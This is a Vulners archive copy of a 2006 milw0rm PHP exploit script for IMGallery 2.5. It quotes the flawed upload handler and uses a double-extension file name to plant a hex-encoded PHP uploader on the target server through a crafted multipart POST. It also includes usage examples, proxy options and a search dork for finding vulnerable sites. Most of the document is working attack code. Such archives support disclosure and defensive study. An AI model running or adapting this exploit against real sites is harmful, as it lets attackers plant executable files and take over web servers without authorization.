Vulners
Lucene search
IMGallery 2.5 - Create Uploader Script
<?
//Kacper Settings
$exploit_name = "IMGallery <= 2.5 Create Uploader Script Exploit";
$script_name = "IMGallery 2.5";
$script_site = "http://www.imgallery.zor.pl/";
$dork = '"Powered by IMGallery"';
//**************************************************************
print '
::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ +:+ +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###
- - [DEVIL TEAM THE BEST POLISH TEAM] - -
[Exploit name: '.$exploit_name.'
[Script name: '.$script_name.'
[Script site: '.$script_site.'
dork: '.$dork.'
Find by: Kacper (a.k.a Rahim)
========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <========
========> http://www.rahim.webd.pl/ <========
Contact: [email protected]
(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon | friend str0ke ;)
Blund Coder, D0han, d3m0n, D3m0n (ziom z Niemiec :P), dn0de, DUREK5, fdj, Grzegorz, GrZyB997, konsol, Mandr4ke,
mass, michalind, mIvus, Nua, nukedclx, pepi, QunZ, Qw3rty, RebeL, SkD, Adam, arkadius, asteroid, blue, Ci2u, CrazzyIwan,
DMX, drzewko, ExTrEmE][-][ack, Gelo, Kicaj, Larry, Leito, LEON, Michas, Morpheus, MXZ, Ramzes, redsaq, TomZen
and
Dr Max Virus
TamTurk,
hackersecurity.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings for 4ll Fusi0n Group members ;-)
and all members of hacker.com.pl ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';
/*
Exploit works only when in script user can upload own photos :)
~~~~~~~~~~~~~
in file users_adm/start1.php:
....
$rozm = $_FILES['obraz']['size'];
if($rozm > $wielkosc_pliku) {header("Location: start.php?kategoria_form=$kategoria_form&info=101&karet=$karet&PHPSESSID=$s_id"); exit;}
//ustala typ mime pliku i tworzy odpowiedni prefix dla funkcji GD
$typ_pliku = $_FILES['obraz']['type'];
switch($typ_pliku) //<------------{1}
{
case 'image/jpeg':
$pref_gd = "jpeg";
break;
case 'image/png':
$pref_gd = "png";
break;
case 'image/pjpeg':
$pref_gd = "jpeg";
break;
}
//koniec ustala typ mime pliku i tworzy odpowiedni prefix dla funkcji GD
$nazwa1 = Date("His");//wykorzystanie daty do wygenerowania nowej nazwy dla pliku //<------------{2}
$nazwa2 = $_FILES['obraz']['name'];//pobranie nazwy pliku z tablicy
$nazwa_zmieniona = "$nazwa1$nazwa2";//po³±czenie daty z nazw± pliku //<------------{3}
//zamienia polskie litery z jêzyczkami aby nie znalaz³y siê w nazwie fotki
$nazwa_zmieniona = strtolower($nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace(" ","_",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("±","a",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("ê","e",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("¼","z",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("¿","z",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("ó","o",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("³","l",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("¶","s",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("¦","s",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("æ","c",$nazwa_zmieniona);
$file = "../obrazy/".$nazwa_zmieniona.""; //dodaje adres i nazwê zdjêcia do zmiennej, która jet tak¿e wykorzystywana podczas tworzenia miniatury w pliku create_min
move_uploaded_file($_FILES['obraz']['tmp_name'],"../obrazy/".$nazwa_zmieniona);//wgrywa plik na serwer //<------------{4}
chmod($file, 0755);
....
we can upload file *.php
np. hauru.jpg.png.php <---- :)
script rename file to:
....
$nazwa1 = Date("His");//wykorzystanie daty do wygenerowania nowej nazwy dla pliku
$nazwa2 = $_FILES['obraz']['name'];//pobranie nazwy pliku z tablicy
$nazwa_zmieniona = "$nazwa1$nazwa2";//po³±czenie daty z nazw± pliku
....
to check correct name of file:
<?
$nazwa1 = Date("His");//wykorzystanie daty do wygenerowania nowej nazwy dla pliku
$nazwa2 = "hauru.jpg.png.php";
echo "$nazwa1$nazwa2";//po³±czenie daty z nazw± pliku
?>
to find you uploaded file go to:
http://site.com/IMGallery path/obrazy/(youfile)
greetz ;)
*/
if ($argc<4) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path session_id OPTIONS
host: target server (ip/hostname)
path: IMGallery path
session id: you user sessionid
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 127.0.0.1 /IMGallery/ 098ab38d17e71de55c7e9993c26d3998
php '.$argv[0].' 127.0.0.1 /IMGallery/ 098ab38d17e71de55c7e9993c26d3998 -P1.1.1.1:80
-----------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host=$argv[1];
$path=$argv[2];
$sid=$argv[3];
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$hauru=
"\x3c\x3f\x70\x68\x70\x20\x0d\x0a\x69\x66\x28\x69\x73\x73\x65\x74".
"\x28\x24\x5f\x50\x4f\x53\x54\x5b\x27\x75\x70\x6c\x5f\x66\x69\x6c".
"\x65\x73\x27\x5d\x29\x29\x7b\x20\x0d\x0a\x20\x20\x65\x63\x68\x6f".
"\x20\x27\x62\x75\x74\x74\x6f\x6e\x20\x63\x6c\x69\x63\x6b\x65\x64".
"\x27\x3b\x20\x0d\x0a\x20\x20\x2f\x2f\x70\x72\x69\x6e\x74\x5f\x72".
"\x28\x24\x5f\x46\x49\x4c\x45\x53\x5b\x27\x66\x69\x6c\x65\x5f\x6e".
"\x27\x5d\x29\x3b\x20\x0d\x0a\x20\x20\x65\x63\x68\x6f\x20\x27\x3c".
"\x68\x72\x3e\x27\x3b\x20\x0d\x0a\x20\x20\x24\x75\x70\x5f\x6d\x61".
"\x73\x20\x3d\x20\x24\x5f\x46\x49\x4c\x45\x53\x5b\x27\x66\x69\x6c".
"\x65\x5f\x6e\x27\x5d\x3b\x20\x0d\x0a\x20\x20\x24\x6d\x61\x73\x5f".
"\x6e\x61\x6d\x65\x20\x3d\x20\x61\x72\x72\x61\x79\x28\x29\x3b\x20".
"\x0d\x0a\x20\x20\x24\x6d\x61\x73\x5f\x74\x6d\x70\x20\x3d\x20\x61".
"\x72\x72\x61\x79\x28\x29\x3b\x20\x0d\x0a\x20\x20\x66\x6f\x72\x28".
"\x24\x69\x3d\x30\x3b\x20\x24\x69\x3c\x31\x30\x3b\x20\x24\x69\x2b".
"\x2b\x29\x7b\x20\x0d\x0a\x20\x20\x20\x20\x69\x66\x28\x21\x65\x6d".
"\x70\x74\x79\x28\x24\x75\x70\x5f\x6d\x61\x73\x5b\x27\x6e\x61\x6d".
"\x65\x27\x5d\x5b\x24\x69\x5d\x29\x29\x7b\x20\x0d\x0a\x20\x20\x20".
"\x20\x20\x20\x24\x6a\x20\x3d\x20\x63\x6f\x75\x6e\x74\x28\x24\x6d".
"\x61\x73\x5f\x6e\x61\x6d\x65\x29\x3b\x20\x0d\x0a\x20\x20\x20\x20".
"\x20\x20\x24\x6d\x61\x73\x5f\x6e\x61\x6d\x65\x5b\x24\x6a\x5d\x20".
"\x3d\x20\x24\x75\x70\x5f\x6d\x61\x73\x5b\x27\x6e\x61\x6d\x65\x27".
"\x5d\x5b\x24\x69\x5d\x3b\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x24".
"\x6d\x61\x73\x5f\x74\x6d\x70\x5b\x24\x6a\x5d\x20\x3d\x20\x24\x75".
"\x70\x5f\x6d\x61\x73\x5b\x27\x74\x6d\x70\x5f\x6e\x61\x6d\x65\x27".
"\x5d\x5b\x24\x69\x5d\x3b\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x7d".
"\x20\x0d\x0a\x20\x20\x20\x20\x7d\x20\x0d\x0a\x20\x20\x66\x6f\x72".
"\x28\x24\x69\x3d\x30\x3b\x20\x24\x69\x3c\x63\x6f\x75\x6e\x74\x28".
"\x24\x6d\x61\x73\x5f\x6e\x61\x6d\x65\x29\x3b\x20\x24\x69\x2b\x2b".
"\x29\x7b\x20\x0d\x0a\x20\x20\x20\x20\x24\x75\x70\x6c\x5f\x66\x69".
"\x6c\x65\x20\x3d\x20\x27\x2e\x2f\x27\x2e\x24\x6d\x61\x73\x5f\x6e".
"\x61\x6d\x65\x5b\x24\x69\x5d\x3b\x20\x0d\x0a\x20\x20\x20\x20\x69".
"\x66\x28\x6d\x6f\x76\x65\x5f\x75\x70\x6c\x6f\x61\x64\x65\x64\x5f".
"\x66\x69\x6c\x65\x28\x24\x6d\x61\x73\x5f\x74\x6d\x70\x5b\x24\x69".
"\x5d\x2c\x20\x24\x75\x70\x6c\x5f\x66\x69\x6c\x65\x29\x29\x7b\x20".
"\x0d\x0a\x20\x20\x20\x20\x20\x20\x65\x63\x68\x6f\x20\x27\x3c\x61".
"\x20\x68\x72\x65\x66\x3d\x22\x27\x2e\x24\x6d\x61\x73\x5f\x6e\x61".
"\x6d\x65\x5b\x24\x69\x5d\x2e\x27\x22\x3e\x27\x2e\x24\x6d\x61\x73".
"\x5f\x6e\x61\x6d\x65\x5b\x24\x69\x5d\x2e\x27\x3c\x2f\x61\x3e\x3c".
"\x62\x72\x3e\x27\x3b\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x7d\x20".
"\x0d\x0a\x20\x20\x20\x20\x7d\x20\x0d\x0a\x20\x20\x7d\x20\x0d\x0a".
"\x3f\x3e\x20\x0d\x0a\x0d\x0a\x3c\x66\x6f\x72\x6d\x20\x65\x6e\x63".
"\x74\x79\x70\x65\x3d\x22\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f".
"\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x22\x20\x6d\x65\x74\x68\x6f".
"\x64\x3d\x22\x70\x6f\x73\x74\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d".
"\x22\x22\x3e\x20\x0d\x0a\x3c\x64\x69\x76\x20\x73\x74\x79\x6c\x65".
"\x3d\x22\x70\x61\x64\x64\x69\x6e\x67\x3a\x20\x31\x30\x70\x78\x3b".
"\x20\x62\x6f\x72\x64\x65\x72\x3a\x20\x31\x70\x78\x20\x73\x6f\x6c".
"\x69\x64\x20\x23\x63\x63\x63\x63\x63\x63\x3b\x20\x77\x69\x64\x74".
"\x68\x3a\x20\x33\x30\x30\x70\x78\x3b\x22\x3e\x20\x0d\x0a\x3c\x3f".
"\x70\x68\x70\x20\x0d\x0a\x20\x20\x66\x6f\x72\x28\x24\x69\x3d\x30".
"\x3b\x20\x24\x69\x3c\x31\x30\x3b\x20\x24\x69\x2b\x2b\x29\x7b\x20".
"\x0d\x0a\x20\x20\x20\x20\x65\x63\x68\x6f\x20\x27\x3c\x70\x3e\x3c".
"\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x22\x66\x69\x6c\x65".
"\x22\x20\x6e\x61\x6d\x65\x3d\x22\x66\x69\x6c\x65\x5f\x6e\x5b\x5d".
"\x22\x3e\x3c\x2f\x70\x3e\x27\x3b\x20\x0d\x0a\x20\x20\x20\x20\x7d".
"\x20\x0d\x0a\x3f\x3e\x20\x0d\x0a\x3c\x2f\x64\x69\x76\x3e\x20\x0d".
"\x0a\x3c\x64\x69\x76\x20\x73\x74\x79\x6c\x65\x3d\x22\x70\x61\x64".
"\x64\x69\x6e\x67\x3a\x20\x31\x30\x70\x78\x3b\x20\x62\x6f\x72\x64".
"\x65\x72\x3a\x20\x31\x70\x78\x20\x73\x6f\x6c\x69\x64\x20\x23\x63".
"\x63\x63\x63\x63\x63\x3b\x20\x6d\x61\x72\x67\x69\x6e\x2d\x74\x6f".
"\x70\x3a\x20\x31\x30\x70\x78\x3b\x20\x77\x69\x64\x74\x68\x3a\x20".
"\x33\x30\x30\x70\x78\x3b\x22\x3e\x20\x0d\x0a\x20\x20\x3c\x69\x6e".
"\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x22\x73\x75\x62\x6d\x69\x74".
"\x22\x20\x6e\x61\x6d\x65\x3d\x22\x75\x70\x6c\x5f\x66\x69\x6c\x65".
"\x73\x22\x20\x76\x61\x6c\x75\x65\x3d\x22\x75\x70\x6c\x6f\x61\x64".
"\x22\x3e\x20\x0d\x0a\x3c\x2f\x64\x69\x76\x3e\x20\x0d\x0a\x3c\x2f".
"\x66\x6f\x72\x6d\x3e\x20";
$data.='---------------------------7d61bcd1f033e
Content-Disposition: form-data; name="urljump"
start.php?kategoria_form=2&PHPSESSID='.$sid.'
---------------------------7d61bcd1f033e
Content-Disposition: form-data; name="obraz"; filename="hauru.jpg.png.php"
Content-Type: text/plain
'.$hauru.'
---------------------------7d61bcd1f033e
Content-Disposition: form-data; name="opis"
DEVIL TEAM ;-)
---------------------------7d61bcd1f033e
Content-Disposition: form-data; name="submit"
Dodaj
---------------------------7d61bcd1f033e--';
echo "You date code1:\n";
echo Date("His");
echo "\n";
$tim1 = Date("His");
echo "upload Hauru!! (step 1)...\n";
$packet ="POST ".$p."users_adm/start.php?kategoria_form=2&PHPSESSID=".$sid." HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Cookie: PHPSESSID=".$sid.";\r\n";
$packet.="Cookie: odwiedziny=zaliczone;\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacket($packet);
echo "You date code2:\n";
echo Date("His");
$tim2 = Date("His");
sleep(1);
echo "\n";
echo "check you localisation of upload script: $tim1\n";
echo 'Find you upload script: http://'.$host.$path.'obrazy/'.$tim2.'hauru.jpg.png.php';
echo "\n";
echo "or search between $tim1 and $tim2\n";
echo "\n";
echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";
?>
# milw0rm.com [2006-12-30]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Dec 2006 00:00Current
7.4High risk
Vulners AI Score7.4